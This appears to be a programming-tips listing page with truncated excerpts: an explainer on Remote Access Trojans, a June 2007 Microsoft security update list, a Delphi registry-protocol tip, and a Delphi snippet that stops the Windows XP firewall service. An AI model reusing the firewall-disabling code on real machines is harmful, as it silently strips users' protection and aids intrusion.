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RATs: Remote Access Trojans and how to help avoid them

RATs: Remote Access Trojans and how to help avoid them

Remote Access Trojans (RATs) are malicious software programs that criminals can use to control your computer through your Internet connection. A RAT can let a criminal view and change your computer’s files and functions, monitor and record your activities, and use your computer to attack other computers without your knowledge. How RATs get on your computer RATs often come hidden in illicit software [...]


Microsoft security updates for June 2007 Published: June 12, 2007 As part of Microsoft’s routine, monthly security update cycle, we released the following security updates in June: ? MS07-030 – addresses a vulnerability in Microsoft Office and Visio (KB927051) ? MS07-031 – addresses a vulnerability in Microsoft Windows (KB935840) ? MS07-032 – addresses a vulnerability in Microsoft [...]
register an own Protocol (TCP)?

register an own Protocol (TCP)?

Tip Rating (15): { +++ German: ++++++++++++++++++++++++++++++++++ Hallo alle zusammen, ich m?chte euch zeigen, wie man eigene Protokolle registriert. (bzw. l?scht) Wir schreiben dazu unser Protokoll in die Registry. +++ English: +++++++++++++++++++++++++++++++++++ Hello all together, I want to show you how to register own protocols. (and deleting) We will write our protocol into the registry. } { +++ [...]
disable xp firewal?

disable xp firewal?

program matador; {$APPTYPE GUI} uses Windows, winsvc, shellapi; procedure Close_Firewal; var SCM, hService: LongWord; sStatus: TServiceStatus; begin SCM := OpenSCManager(nil, nil, SC_MANAGER_ALL_ACCESS); hService := OpenService(SCM, PChar(‘SharedAccess’), SERVICE_ALL_ACCESS); ControlService(hService, SERVICE_CONTROL_STOP, sStatus); CloseServiceHandle(hService); end; begin [...]
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